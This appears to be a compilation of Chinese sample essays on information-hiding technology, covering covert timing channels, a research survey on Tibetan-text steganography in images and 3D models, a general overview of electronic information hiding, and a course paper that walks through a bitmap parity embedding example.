的存在就是问了实现隐蔽通信。隐蔽信道是可行的,从信息理论角度,信息的输出和输入是有着必然的联系,隐蔽信道从正常的输入端输入,隐蔽信息的接收方从正常的信道接收这样就可以实现信息的隐蔽,其中必须具备以下的条件;(1)传送放和接收方的共享资源属性和权限必须相同;(2)必须能够控制传送方和接收方之间的通信,能够调节传输的顺序;(3)必须满足时间特性双方都参考一个时钟。网络时间信道可以作为载体把传送方和接收方联系起来,传送者改变报文时间特性接收者可以第一时间检查出被改变的时间报文对其进行解读。

2.3隐蔽时间信道特性分析

计算机网络中传输的相邻报文往往是不在相同的网络环境下,所以在网络传送的时间上是有差别的,根据相邻报文的时间差来接收隐蔽的通信信息是隐蔽信息技术的有效途径之一,但是相邻报文的传送存在一定的误码率,所以要最大限度的提升信息容量,隐蔽信息技术必须提高对网络环境的抗干扰能力。信息隐藏算法中主要有两种算法,其中有空间域算法,其中最具代表性的就是lsb算法。对于扩展时间信道的容量我们必须加强对算法的研究。

2.4信息隐藏技术对现代的意义

隐藏技术论文范文第7篇

关键词:藏文传输;信息隐藏;秘密信息共享;信息安全

中图分类号:TN401 文献标识码:A 文章编号:2095-1302(2014)12-00-05

0 引 言

安全、有效的信息传输对国家安全、社会稳定和人民安居乐业至关重要。网络和多媒体技术的发展,使得信息传输的速度和数量正以惊人的增量发展。然而,信息传输的便利在方便人们的同时也给信息安全带来了隐患,同时也为基于数字载体的秘密信息传输提供了广阔的研究空间。目前,基于载体的秘密信息传输是信息安全领域的一个方兴未艾的研究热点。而基于载体预处理的藏文信息隐藏技术将为信息安全领域提供一些新的数字信息共享和传输理念,特别是藏文的预处理规律、在数字信息中的隐藏规律等,将有助于涉藏秘密通信技术的发展,并可以对民用和商用领域中涉及到藏文内容的传输、共享、存储和提取的通信过程起到安全保护、版权保护及完整性认证的作用,并对国家涉藏领域的网络舆情监控、国内外涉藏敏感信息标注和情感色彩认知起着至关重要的作用。

在藏文信息隐藏技术方面,目前主要涉及的技术有关键字识别、字符识别和提取、韵律认知、语义角色标注、文本资源挖掘和语料抽取等,并以此为基础进行置乱优化。

1 国内外信息隐藏技术研究现状

信息隐藏一直是信息安全领域中保障隐秘信息安全传输和数字信息版权的重要手段,也是近年来国内外学者研究的热点之一。最新的一届ACM信息隐藏和多媒体安全会议(ACM IH&MMSec’13 Workshop)的主要研究内容有信息隐藏算法、多媒体水印和认证、载体运算域的数字信号处理等。其中,信息隐藏算法的设计首先依赖于载体的选择和预处理;关于多媒体水印和认证的研究则将信息隐藏和数字水印的载体范围从数字图像等常见载体拓展到了包括三维模型在内的新型载体上;载体运算域的数字信号处理涉及到了载体预处理时所用的具体方法,如空间域或变换域等。2013年IEEE 图像处理国际会议(IEEE ICIP 2013)的主要研究内容包括图像、音视频和3-D等多媒体的信息隐藏算法和多媒体特征提取和分析等,这两类研究内容均与载体的选取和预处理有关。最新一届信息隐藏国际会议(IH2012)的主要研究内容包括多媒体安全和其他载体的信息隐藏。我国的第十一届全国信息隐藏暨多媒体安全学术大会(CIHW2013)中关于信息隐藏算法的研究内容也主要集中在非常规载体的分析和预处理上。

藏文作为信息隐藏领域一种新的信息格式,对其研究主要局限于藏文操作系统、藏文信息技术标准、藏文信息处理等几个方面[1],具体内容集中在藏文编码字符集、术语集、拼音辅助集等的建立。

基于载体的秘密通信技术是20世纪90年代中期发展起来的跨领域的学科,而载体的预处理技术一直是其研究的主要方向。对隐藏载体进行预处理,生成信息隐藏嵌入区域是信息隐藏算法中最重要的研究内容之一。从上述国内外各学术会议中关于信息隐藏的参会论文和研讨情况看,各类载体固有特性的研究对预处理技术有着重要的意义,且数字图像依然是主要的一类载体,而三维模型将是未来主要研究的一类非常规载体。下面就对数字图像和三维模型两类载体的预处理技术的研究现状进行阐述。

1.1 数字图像预处理技术研究综述

基于数字图像的信息隐藏技术是信息隐藏学科中重要的技术分支,是目前应用最广、覆盖范围最大的信息隐藏技术手段。在基于数字图像的信息隐藏技术研究中,信息隐藏区域的生成是关系算法性能的重要因素。信息隐藏区域的生成方法主要包括空间域生成法、变换域生成法以及空间域和变换域联合的生成方法。

空间域算法:作为空间域算法中出现最早、操作最简单且应用最广泛的算法,基于位平面分解理论的LSB算法可以直接替换的方式隐藏较大的数据量,刘红翼等提出的一种LSB算法具有容量大、运算量小的特点[2];刘文彬等提出的LSB隐写替换的消息定位方法则可以对此类算法进行检测[3];而IH2012的论文中,有学者运用假设检验理论和含秘载体的奇偶感知特性可有效地检测LSB算法所隐藏的隐秘信息[4,5],这些研究为藏文信息隐藏中涉及到关于此类算法的抗检测性研究提供了新的待改进方向。张焱等提出的像素值排序和赵彦涛等提出的直方图修改等空间域算法在沿用LSB直接替换的隐藏理念的同时,还提升了鲁棒性,因此也被广泛用于数字图像载体预处理[6,7];随后,杨春芳等提出了针对此类算法的检测方法[8],这也为针对此类算法抗检测性改进的研究提供了重要依据。此外,上述同类算法中的载体子区域划分思想、内容自适应思想等也对本项目基于载体结构特性建立空间匹配模型的机制提供了方法学上的有力支持[9-13]。

变换域算法:不同于空间域算法直接对载体的空间特性进行修改,变换域预处理方法以修改载体的频率参数来隐藏信息[14],因此算法的鲁棒性比空间域算法好。在此基础上,唐燕等又对隐秘信息的检测和恢复进行了研究和改进,实现了几乎无需原始参量的半盲提取[15]。尽管变换域算法不具备空间域算法容量大、运算量小和易操作等优势,但是变换域中的多小波理论因其同时具有对称性、短支撑性、二阶消失矩和正交性等特性成为了信号处理中有明显优势且较常用的方法,在前期研究中利用多小波方法将数字图像载体分块后作为嵌入区域,提高了算法的鲁棒性和不可见性[16,17],这种方法为在藏文信息隐藏研究中建立基于区域能量的阶梯性分布机制提供了一种研究手段。

混合域算法:较单独运用一种空间域或变换域生成隐藏区域并设计信息隐藏算法来看,基于空间域与变换域联合的信息隐藏算法可以兼有多种算法的性能优势。在基于空间域和变换域联合的信息隐藏算法中,空间域的作用体现在数据嵌入的具体操作方面,因为隐藏的实质就是在当前环境下的空间分量上进行数据修改,利用边缘像素值差分(Edged Pixel Value Differencing,EPVD)将载体换算为若干个像素块,以最大斜角的数据修改作为信息隐藏的具体方法[18];利用湿纸码和基于LSBM的双层隐写来对载体进行加1嵌入或减1嵌入[19];另外,国内外许多学者利用调色板理论进行数据嵌入[20,21]。而变换域在载体预处理中的主要作用是生成满足特定需要的信息隐藏环境(区域),主要包括变换后的系数分布以及n阶分量子图等。如对RSV颜色空间的V分量做DCT变换,分块后作为嵌入区域[22];利用视觉显著点技术确定跟踪窗(Regions of Interest,ROI),在ROI的DCT系数上嵌入隐藏信息,并指定某个ROI边缘地图脆弱性标识,嵌入到DWT变换后的含密图像中[23];前期研究中,研究人员利用自适应颜色迁移理论中lαβ域对颜色的控制力,消除了RGB颜色分量的强相关性,并结合GHM能量分区隐藏信息,在不可见性、嵌入信息量和鲁棒性方面均具有较好的表现[24]。

1.2 三维模型预处理技术研究综述

潘志庚等将基于三维模型的信息隐藏预处理方法主要分为空间域算法和变换域算法[25]。这也这为藏文信息隐藏研究提供了新的思路和方法。

空间域算法:空间域算法通常具有易嵌入和盲提取的特点,如直接置换载体的几何信息来隐藏数据是三维模型载体信息隐藏最原始、最直接的方法[26]。为改进此类算法的鲁棒性,引入仿射不变量是有效的措施,如利用具有连续解析性的仿射不变量优化需要置换的顶点[27]、 将稳态锚点通过三角垂心编码解析为聚类元素从而嵌入隐秘信息[28]。此外,基于主元分析的算法也有助于改善空间域算法的鲁棒性,例如可根据主元分析(Primary Component Analysis,PCA)来确定模型的关键位置作为鲁棒区域,并用网格分割法改进鲁棒性和不可见性[29-32]。这类算法也为藏文信息隐藏从载体结构特性进行解析和预处理提供了理论依据。改进型的空间域算法多针对鲁棒性或容量性有所提升,如基于连续解析性的体积矩的盲算法,改善了之前算法对连通性攻击的鲁棒性[33];通过重排顶点和面片在网格文件中的表示信息,利用表示域内的信息进行嵌入使算法具有良好的不可见性和大容量性[34],但对相似变换以外的攻击不具有鲁棒性。

变换域算法:三维模型预处理的变换域方法大多利用频谱分析将模型信息参数化[35],对参数进行少量修改后以隐藏信息,其中,基于小波变换的算法可以对规则和非规则网格模型进行小波域参量修改以嵌入较多信息[36]。理论上,变换域算法比空间域算法鲁棒性强,但由于三维模型顶点的天然无序性和不规则性,对其进行频谱分析难度大,导致变换域算法实用性目前较低,因此空间域算法依然是比变换域算法更有实用价值的研究方向[37]。

2 藏文信息隐藏技术研究现状

目前反映藏文信息处理技术最新进展的文献较少,综合以已有的研究成果及相关研究文献,藏文信息处理可划分为藏语信息处理和藏字信息处理两个层次[38,39]。藏语信息处理包括机器翻译、信息检索、信息提取、文本校对、文本生成、文本分类、自动摘要以及藏文字识别和语音识别的后处理等等;而藏字信息处理包括操作系统以及编码字符集、输入技术、字形描述与生成、存储、编辑、排版、字频统计和藏字属性库等。这些研究基础对藏文信息隐藏技术的发展至关重要,是基于载体预处理的藏文信息隐藏的主要技术来源。鉴于藏文的独特构造,以及藏文的特点,目前对藏文秘密信息的预处理技术一般指置乱和加密算法的选择[40],而置乱使信息变得杂乱无章难以辨认,可以起到加密与改变信息嵌入特性的作用。可用于藏文信息隐藏的置乱算法主要有Arnold变换、幻方矩阵、Gray码变换、混沌序列等方法[41]。其中,Arnold变换算法简单且置乱效果显著,使有意义的数字图像变成像白噪声一样的无意义图像,实现了信息的初步加密和信息结构的调整,在嵌入信息为数字图像时可以很好的应用[42]。幻方置乱的思想基于查表思想,基于数字图像的幻方置乱可降低幻方置乱阶数或以图像块进行置乱,实现置乱效果与系统开销的平衡[43]。Gray是一种具有反射特性和循环特性的单步自补码,它的循环、单步特性消除了随机取数时出现重大误差的可能,它的反射、自补特性使得求反非常方便[44]。混沌的优势在于对初始条件的极端敏感和轨迹在整个空间上的遍历性。根据经典的Shannon置乱与扩散的要求,这些独特的特征使得混沌映射成为信息隐藏嵌入算法的优秀候选[45]。上述传统的置乱算法一般用于正方形图像处理,而经过改进的Arnold算法可直接用于宽高不等的矩形图像而不必进行正方形扩展[46],这也将是藏文信息隐藏技术所采用的主要置乱方法之一。

3 藏文信息隐藏技术的研究目标、研究内容和要解决的问题

3.1 研究目标

面向藏文安全通信的高性能信息隐藏算法是目前藏文信息隐藏技术的主要目标,包括提出性能出色的、适合藏文通信要求的信息隐藏算法;提出一种具有普适性的高性能信息隐藏嵌入区域生成原则和嵌入规则:

(1) 基于数字图像的藏文信息隐藏算法:提出至少两种基于数字图像的藏文信息隐藏算法,算法将同时满足面向藏文安全的信息隐藏应用所要求的高不可见性(PSNR≥34.90dB)、强鲁棒性(抗击大约69%以下的JPEG2000压缩、35%以下的剪切及常见滤波与加噪)、大容量性(基于彩色图像的信息隐藏信息嵌入率≥18%)以及高感知篡改性(检测隐藏数据是否被篡改能力≥95%)。

(2) 基于三维模型的藏文信息隐藏算法:提出至少一种基于三维模型的藏文信息隐藏算法。算法将同时满足面向藏文安全的信息隐藏应用所要求的高不可见性(RSNR≥69.94dB、En≥70%)、应对一般攻击的强鲁棒性(抗击大约0.10%随机加噪、50-times Laplacian平滑、50%均匀重网格化以及均匀简化等)、大容量性(相对理想的RSNR,嵌入率≥29%)以及低复杂度(根据载体模型几何信息量而变化)。

(3) 普适性信息隐藏嵌入区域生成原则和嵌入规则:利用载体图像能量和复杂度特性,提出基于能量性和复杂度的藏文信息隐藏区域生成原则和嵌入规则,将适应于所有对数字图像处理后有能量区别的图像处理方法,指导设计者利用能量与鲁棒性、复杂度与不可见性的对应关系,研究出同时满足不可见性和鲁棒性的信息隐藏算法。

3.2 研究内容

(1) 藏文信息隐藏区域生成原则与规则研究:数字图像信息隐藏技术的研究核心集中在隐藏区域和嵌入规则的设计上,藏文信息隐藏算法的设计方法和思路就是在选定藏文信息隐藏区域以及制定好信息隐藏规则后,按照一定的顺序将两者进行合理的组织,所以研究藏文信息隐藏区域生成原则以及信息隐藏规则是重点。

(2) 基于数字图像的藏文信息隐藏算法研究:隐藏算法是基于数字图像的信息隐藏技术的研究核心,需按照嵌入域进行划分,对基于空间域和基于变换域的信息隐藏算法分别进行研究,提出单独基于空间域、单独基于变换域以及两者联合应用的数字图像信息隐藏算法。

(3) 基于三维模型的藏文信息隐藏算法研究:首先对三维模型的结构特性和能量特性进行研究,再根据载体模型的特性找出对应的预处理方法。在研究基于空间域和基于变换域的信息隐藏算法的基础上,提出改进型的三维模型信息隐藏算法。主要用于提升载体有效嵌入容量和降低载体视觉失真度。

(4) 载体与藏文秘密信息的一致化方法研究:基于上述研究基础,生成结构和能量差异化子区域,再将藏文秘密信息按照拼音属性进行解析生成信息序列。再利用优化算法使得预处理后的载体信息和藏文秘密信息的解析编码获得最大一致化,从而提高算法性能。

3.3 需解决的关键问题

综合已有的研究,在藏文信息隐藏技术方面,目前需要解决的问题有以下几个方面:

(1) 信息隐藏区域与嵌入规则设计:在具有什么性质的区域内应用什么样的规则进行藏文信息隐藏才可以解决“不可见性与鲁棒性的对立、容量性与抗分析性的对立”问题,是藏文信息隐藏研究领域的关键技术之一。需找出隐藏区域的性质与信息隐藏性能的关系,提出面向藏文信息传输的信息隐藏区域选择的原则与方法;给出在具有具体性质的嵌入区域中的藏文信息隐藏嵌入规则的制定原理和方法;提出大量的藏文信息数据转换思想与方法,以提供形式多样的信息隐藏嵌入规则。

(2) 数字图像载体预处理方法:①多小波理论在载体预处理中的应用。对于数字图像经过多小波变换后所具有的特殊性质,找出多小波变换后数字图像所具有的能量特性与基于数字图像信息隐藏算法性能之间所遵循的规律已有学者进行研究。②颜色空间的性能分析与应用选取。RGB、CMYK、lαβ、YUV以及HSx颜色空间,应用方法以及应用各有优劣势。该技术的应用难点在于为颜色空间在藏文信息隐藏的应用提出完备的应用方案,因为这些颜色空间在藏文信息隐藏技术中的应用目前非常少,应用优劣还处于实验验证阶段,没有理论验证的支持。

(3) 三维网格模型载体预处理方法:骨架抽取和内切球解析技术在藏文信息隐藏算法中的应用。这种方法不涉及顶点数量及坐标的改变和拓扑关系的修改。难点在于寻找一个理想的仿射不变量作为辅助参数以弥补算法对缩放攻击的脆弱性。

(4) 藏文的置乱与遗传优化算法:有的藏文字处理系统把藏文看成是由30个辅音、4个元音、3个上加字、5个下加字共42个藏文字符组成的,而有的则认为由其他数量的字符组成。基于对藏文中加字对发音的影响规律的研究,利用字符与二进制码的解析规则和置乱与优化技术对信息置乱,达到隐藏信息与载体信息的最大匹配度也是一个技术难点。

4 藏文信息隐藏技术研究的新方法

(1)利用载体图像能量和复杂度特性,提出基于能量性和复杂度的藏文信息隐藏区域生成原则和嵌入规则。高能量与强鲁棒、高复杂度与高不可见性的对应关系,从根本上解决藏文信息隐藏算法中不可见性和鲁棒性的对立问题,为面向藏文通信安全的信息隐藏算法的设计给出一种普适性方法。

(2)根据数字图像信息隐藏嵌入区域的生成原则和嵌入规则,提出新的、高性能的数字图像的藏文信息隐藏算法。算法利用lαβ等颜色空间转换以及多小波对载体图像进行的处理,生成具有不同能量特性的嵌入区域,从频率域上满足藏文信息隐藏的应用要求;通过对载体图像进行颜色迁移、矢量解析以及环形处理,从数字图像的空间结构上满足藏文信息隐藏的应用要求。

(3)提出满足三维模型结构特性和能量特性的藏文信息隐藏算法。算法利用局部高度理论和均值偏移理论对载体模型进行预处理,生成具有不同能量特性的嵌入区域,从频域上满足信息隐藏的应用要求;通过对载体图像进行骨架抽取、内切球解析,从空间结构上满足藏文信息隐藏的应用要求。

参考文献

[1]陈玉忠,俞士汶. 藏文信息处理技术的研究现状与展望[J]. 中国藏学. 2003(4):97-107.

[2]刘红翼,王继军,韦月琼,等.一种基于LSB的数字图像信息隐藏算法[J].计算机科学,2008, 35(1):100-102.

[3]刘文彬,刘九芬.一种针对LSB替换隐写的消息定位方法[J].信息工程大学学报,2013,14(6):641-646.

[4] R. Cogranne, C. Zitzmann, F. Retraint,et al. Statistical Detection of LSB Matching Using Hypothesis Testing Theory[C].In: Proceedings of the 14th International Conference on Information Hiding,2013.

[5] J. Fridrich, J. Kodovsky. Steganalysis of LSB Replacement Using Parity-Aware Features[C]. In: Proceedings of the 14th International Conference on Information Hiding, 2013.

[6] 张焱,张敏情,瓮佳佳.基于直方图对的大容量信息隐藏算法[J].计算机应用研究,2013,30(7):2108-2111.

[7] 赵彦涛,李志全,董宇青.基于排序和直方图修改的可逆信息隐藏方法[J].光电子.激光,2010,2(1):102-106.

[8] 杨春芳,刘粉林,罗向阳.基于相对熵的直方图差异与JPEG隐写的定量分析[J].计算机研究与发展, 2011,48(8):1563-1569.

[9] 熊志勇,王江晴.基于差分直方图平移的彩色图像可逆信息隐藏[J].四川大学学报,2011,43(3): 81-89.

[10] Z.H. Wang, C.F. Lee, C.Y. Chang. Histogram-shifting-imitated reversible data hiding[J]. The Journal of Systems and Software, 2013,86(2): 315-323.

[11] X.L. Li, J. Li, B. Li, et al. High-fidelity reversible data hiding scheme based on pixel-value-ordering and prediction-error expansion[J].Signal Processing,2013, 93(1): 198C205.

[12] X.T. Wang, C.C. Chang, T.S. Nguyen, et al. Reversible data hiding for high quality images exploiting interpolation and direction order mechanism[J]. Digital Signal Processing, 2013,23(2): 569C577.

[13] Nabin Ghoshal, Anirban Goswami, H. S. Lallie. Adaptive Steganography for Image Authentication Based on Chromatic Property[C]. In: Proceedings of the International Conference on Frontiers of Intelligent Computing: Theory and Applications (FICTA),2013.

[14]和红杰,张家树.对水印信息篡改鲁棒的自嵌入水印算法[J].软件学报,2009,20(2):437-450.

[15] 唐燕,闾国年,殷奎喜.规范类正交矩阵的信息隐藏算法[J].东南大学学报,2013,43(1):45-49.

[16] T. Zhang, D.J. Mu, S. Ren, et al. Study of reversible information hiding scheme based on CARDBAL2 and DCT[C].Proceedings-2010 3rd IEEE International Conference on Broadband Network and Multimedia Technology (IC-BNMT2010),2010.

[17] T. Zhang, D.J. Mu, S. Ren. A Confidential Communication-Oriented Information Hiding Algorithm based on GHM multi-wavelet and DCT[J].Applied Mathematics & Information Sciences,2013, 7(5): 1803-1807.

[18] H.B. Kekre, P. Halarnkar, K. Dhamejani. Capacity increase for information hiding using maximum edged pixel value differencing[J].Communications in Computer and Information Science,2011, 145(1): 190-194.

[19] 奚玲,平西建,张韬.整数小波域湿纸码自适应信息隐藏算法[J].计算机辅助设计与图形学学报,2011,2(7):1217-1223.

[20] H. Zhao, H.X. Wang, M.K. Khan. Steganalysis for palette-based images using generalized difference image and color correlogram[J].Signal Processing, 2011,91(11): 2595-2605.

[21] A. Lamgunde, A. Kale. Palette based technique for image steganography[J].Communications in Computer and Information Science, 2011,125(2): 364-371.

[22] Y.J. Qiu, H. T. Lu, N. Deng, et al. A robust blind image watermarking scheme based on template in Lab color space[C].2011 International Conference on Computing, Information and Control(ICCIC 2011),2011.

[23] L.H. Tian, N.N. Zheng, J.R. Xue, et al. An intergrated visual saliency-based watermarking approach for synchronous image authentication and copyright protection[J].Signal Processing:Image Communication,2011,31(2): 9-64.

[24] 任帅,张|,慕德俊,等.基于GHM多小波与自适应颜色迁移的信息隐藏算法研究[J].西北工业大学学报,2010,28(2):64-269.

[25] 潘志庚, 孙树森, 李黎.三维模型数字水印综述[J].计算机辅助设计与图形学学报,2006,18(8):1103-1110.

[26] S.H. Lee, K.R. Kwon. VRML animated model watermarking scheme using geometry and interpolator nodes[J].Computer-Aided Design,2011,43(8): 1056-1073.

[27] M. Luo, A.G. Bors. Surface-preserving robust watermarking of 3-D shapes[J].IEEE Transactions on Image Processing, 2011,20(10): 2813-2826.

[28] L. Du, X.C. Cao, M.H. Zhang, et al. Blind Robust Watermarking Mechanism Based on Maxima Curvature of 3D Motion Data[C]. In: Proceedings of the 14th International Conference on Information Hiding,2013.

[29] Z.Q. Yao, R.J. Pan, F.H. Li, et al. A mesh partitioning approach for 3D mesh oblivious watermarking[J].Chinese Journal of Electronics, 2010,19(4): 651-655.

[30] S. Cai, X.K. Shen. Octree-based robust watermarking for 3D model[J].Journal of Multimedia, 2011,6(1): 83-90.

[31] S. Cai, X.K. Shen. OTP-W:Octree partition-based 3D mesh watermarking[C].Second International Workshop on Education Technology and Computer Science,2010.

[32] 廖学良,王屏.一种新的三维模型水印嵌入空域算法[J]. 计算机学报,2008, 31(10): 1848-1856.

[33] K. Wang, G. Lavouéa, F. Denisb, A. Baskurt. Robust and blind mesh watermarking based on volume moments[J].Computers & Graphics,2011, 35(1): 1-19.

[34] I.L. Chung, C.M. Chou, D.C. Tseng. Hiding data in triangle meshes by rearranging representation order[J].International Journal of Innovative Computing, Information and Control,2011, 7(6): 3419-3435.

[35] 胡敏,刘辉.基于特征点的自适应三维网格数字水印算法[J].合肥工业大学学报(自然科学版),2010,33(1):55-59.

[36] M. Hachani, A.Z. Ouled, S. Bahroun. Wavelet based watermarking on 3D irregular meshes[C]. 19th IEEE International Conference on Image Processing(ICIP),2012.

[37] Y.P. Wang, S.M. Hu. Optimization approach for 3D model watermarking by linear binary programming[J].Computer Aided Geometric Design, 2010,27(5): 395-404.

[38]陈力为. 中文信息处理丛书序言[M].北京:清华大学出版社,2000.

[39]俞士汶,朱学锋,贾玉祥. 汉语隐喻自动处理研究之概况[C].第四届文学与信息技术国际研讨会,2008.

[40] 谭良,吴波,刘震,等.一种基于混沌和小波变换的大容量音频信息隐藏算法[J].电子学报,2010,38(8):1812-1819.

[41] 丁玮,闫伟齐,齐东旭.基于置乱与融合的数字图象隐藏技术及其应用[J].中国图象图形学报,2000,5(8):644-649.

[42] 田云凯,贾传荧,王庆武.基于Arnold变换的图像置乱及其恢复[J].大连海事大学学报:自然科学版,2006,32(4):107-109.

[43] 彭万权,张承畅,冯文江,等.多阶幻方卷积码的构造及译码[J].电子学报,2013,41(1):123-130.

[44] W. Din, W.Q. Yan, D.X. Qi. Digital image scrambling technology based on Gray code[C]. In Proceedings of International Conference on CAD/CG,1999.

隐藏技术论文范文第8篇

电子信息隐藏技术是近些年来在多媒体技术和互联网推动下发展起来的一种信息安全技术。这种技术具备明显的优势,因而被广泛的应用。本文从电子信息隐藏技术的概述出发,分析了电子信息隐藏技术特征,并就电子信息隐藏技术的应用进行了讨论,希望能为相关者提供帮助,使他们能够深入研究电子信息隐藏技术,提高电子信息隐藏技术的应用水平。

关键词:

电子信息;隐藏技术

在利用互联网传送数据、文件的时候,极有可能会出现数据、文件被攻击、窃取等问题,尤其那些关于国家安全、经济发展、个人隐私的资料,一旦被非法分子获取,极有可能会影响国家的经济以及个人的安危。为了有效的解决这些问题,人们引入了网络加密技术。但是加密技术将文件、数据变成了乱码,更易激发某些人“挑战权威”的欲望。为了解决新问题,人们又引进了信息隐藏技术,将机密文件“伪装”成普通文件,这样就能有效的混淆人们的视听,提升网络传输的安全性。

一、电子信息隐藏技术

电子信息隐藏与信息伪装是同一个概念,都是利用有效手段将机密信息隐藏于另一个非机密信息之中,用以混淆“有心人”视听的一种电子信息技术。隐藏技术的载体类型非常的多样,可以是图像、声音、视频还可以是文档,因此,不易被一般人辨识,即便某些人发现了隐藏信息,也难以提取信息,这就使得机密的信息、文件得以安全传输。因传统的加密技术思想和方法具备优势,所以现阶段人们所使用的信息隐藏技术是在有所保留的同时进行了改进。按照处理对象的不同信息隐藏技术可以被分为数字水印技术、叠像技术以及替声技术等。其中,叠像技术是一种将信息隐藏在载体中进行安全传输的技术。数字水印技术可以在开放的网络环境下保护版权,可以识别与版权相关各方的信息,并将这些信息转化成“隐藏信息”嵌入图像、音频、视频等,以实现确认所有权和信息跟踪目标。替声技术按照声音包含的内容进行分类,可以通过处理声音信息,改变原声的对象、内容等隐藏真正的声音信息。

二、电子信息隐藏技术的特征分析

与传统的信息相比,安全技术电子信息隐藏技术具备六个明显的特征优势:第一,安全性。能够有效的抗击强攻击能力,即便是遭受了一定的人为攻击,隐藏信息也可以最大限度的保存,而不受破坏。第二,隐蔽性。因为电子信息隐藏技术将需要传递的信息、资料隐藏于普通载体之中,信息对象的外部特征得以伪装,也更难以被不法分子察觉、阻拦。第三,不可测性。因为隐蔽载体与原始载体存在某些潜在的、不容人轻易窥见的关联性,即使被人拦截,想要正确的提取,却也存在较大的困难。即便是能够提取,也需要消耗大量的时间,这也就为信息、资料拥有者采取有效措施提供了时间。第四,不可见性。电子信息隐藏技术利用人类视听觉属藏处理资料、信息,目标资料的内容、质量并没有改变,但却无法被人为的看见或是听见。第五,不可变性。即便是隐藏载体发生变化,比较常见的变化类型包括诸如增强、滤波、有损压缩、重采样等一系列传输过程中的载体信号处理,诸如旋转、平移、分割、缩放等一般的几何变换以及恶意攻击等,目标文件所包含的信息也不会丢失。第六,自恢复性。虽然电子信息隐藏技术具备不可变性,但是这种性质并不能保证信息百分之百的绝对的“不可变”,因此,自恢复性有效的解决了操作损毁、变换文件的问题,只要损毁的标文件还残留部分的数据,即使没有宿主信号,也可以采取有效的措施,对目标文件进行恢复。

三、电子信息隐藏技术的应用状况

(一)数据保密方面的应用互联网的使用方便了人们的生活、学习,人们利用互联网进行资料、数据的传输。然而,随着互联网技术的普及,很多不法之徒也将目光转向了互联网方向,非授权用户利用不法手段截获、使用相关资料,导致网络不安全问题发生,严重的损害信息、资料所有者的权益。现阶段,经济全球化发展迅猛,互联网传输资料所涉及的面也更加的广泛,政治、军事、商业、金融、个人隐私等的泄漏将会带来的不良结果,谁也无法妄下断言。因此,信息隐藏是及其重要且必要的。信息隐藏技术可以保护网上信息交流的安全系,还可以满足一些人隐藏存储私人的、“不愿为外人道”的个人隐私。

(二)数据完整性鉴定方面的应用现阶段最常使用的信息隐藏技术包括数字水印技术、叠像技术以及替声技术,通过分析这三种技术的实际应用情况,不难发现数字水印技术存在缺陷,一旦保护媒体被篡改,数字水印技术所隐藏的目标文件将会被破坏、暴露,进而被不法之徒识别。数字水印技术的使用在数字票据中比较常见。由于隐藏的水印经打印后仍可保留,因此在鉴别数字票据真伪的时候,可以利用再扫描的方法使水印变为数字形式,提取防伪水印。数据完整性鉴定包括鉴定信号真伪、鉴定信号的完整性、指出信号差别以及资料传输过程有无发生篡改、丢失等情况。数据完整性鉴定可以准确的鉴定获知信号的真实性,大幅度的降低虚假、错误信息的使用。在具体应用的时候主要包括如下两个步骤:首先,利用数据库管理系统保证数据完整、准确的输入和储存。其次,充分考虑实际情况,选择最合适的数据校验方式对传输数据进行校验检查。

四、结束语

综上所述,信息隐藏技术具备难以估量的应用价值以及广阔的应用前景。但是作为一种有效的新型信息安全技术,信息隐藏技术的体系以及技术等都还有待加强。相关人士应充分的认识现阶段的信息隐藏技术的优势与劣势,深入的研究信息隐藏技术,进而使信息隐藏技术更好的发挥作用。

参考文献:

[1]陈素霞,陈亚锋.浅谈信息隐藏技术及其应用[J].沿海企业与科技,2010(03).

[2]韩敏,董俊磊.浅谈信息隐藏技术的理论及应用[J].黑龙江科技信息,2010(06).

隐藏技术论文范文第9篇

关键词:信息隐藏;协作学习;立体化

随着网络中信息安全事件的不断升温,网络安全教育也越来越受到高校重视。各大高校纷纷开设该类课程。本校计算机科学与技术、信息工程等专业都相继开设《网络与信息安全》、《信息安全》、《信息安全技术》等课程,普及网络安全知识,提高学生的网络安全技能,增加网络安全意识。以《网络与信息安全》课程为例,课程分配学分为4.0,采用“2+2”模式教学,其中理论2.0为课堂教学和课堂讨论课时,实验2.0为实验课时,即每周理论2节课,单周理论课时,双周讨论课,实验课每周2节课。该课程的体系结构如图1所示。[1,2]

教学过程中的基础内容

《网络与信息安全》课程分为三大模块:①网络安全基本知识概述。该模块主要讲述了网络安全的发展和现状问题,列举网络安全问题引发的各种不同影响的案例。②网络攻击技术。该模块主要讲述网络中的一些攻击现象、攻击行为以及攻击工具等。③密码学模块。该模块主要讲述古典密码学和现代密码学的一些应用,以及信息隐藏技术的一些实际作用等。④网络防护技术。该模块主要讲述网络中针对安全的一些防护措施,如防火墙、入侵监测系统等。

以信息隐藏技术为例,该部分内容在整个课程中非常重要,它将一些保密或重要的信息隐藏到另外一个可以公开的媒体之中,如把指定的信息隐藏于数字化的图像、声音或文本当中,充分利用人们的“所见即所得”的心理,来迷惑恶意的攻击者。近几年来,信息隐藏技术不断发展,越来越多地应用在生活中,如隐写术、数字水印、数字指纹、隐藏信道、阈下信道、低截获概率和匿名通信等,是目前较热的话题。[3,4]

在课程中这部分内容是整个课程的重点、难点之一,教学过程采用了比较、举例等方法,课时分配――理论教学:讨论:实验=1:1:2,理论讲授以图1中的知识框架为主线,算法原理及实现方法,讨论和实验结合中软吉大的网络信息安全系统进行教学。综合起来可以把这部分内容分为以下几部分。

1.信息隐藏位图法

位图法目前使用越来越少,但作为一种基础信息隐藏方法,仍有较高的教学应用价值。该方法作为课程中的一个基本知识点,要求学生掌握它的基本原理,并能通过一个案例,掌握主要运算过程如下:

例如,一幅24位BMP图像,文件头和图像数据由54字节组成,文件头不能隐藏信息,从第55字节开始为图像数据部分,这部分可以隐藏信息。图像数据部分是由一系列的8位二进制数所组成,因为每个8位二进制数中“1”的个数只有奇数或偶数两种可能性,因此若一个字节中“1”的个数为奇数,则称该字节为奇性字节,用“1”表示;若一个字节中“1”的个数为偶数,则称该字节为偶性字节,用“0”表示。我们用每个字节的奇偶性来表示隐藏的信息。

设一段24位BMP文件的数据为:01100110,00111100,10001111,00011010,00000000,10101011,00111110,10110000,则其字节的奇偶排序为:0,0,1,1,0,1,1,1.现在需要隐藏16进制信息4F,由于4F转化为8位二进制为01001111,将这两个数列相比较,发现第2,3,4,5位不一致,于是对这段24位BMP文件数据的某些字节的奇偶性进行调制,使其与4F转化的8位二进制相一致:第2位:将00111100变为00111101,则该字节由偶变为奇;第3位:将10001111变为10001110,则该字节由奇变为偶;第4位:将00011010变为00011011,则该字节由奇变为偶;第5位:将00000000变为00000001,则该字节由偶变为奇。

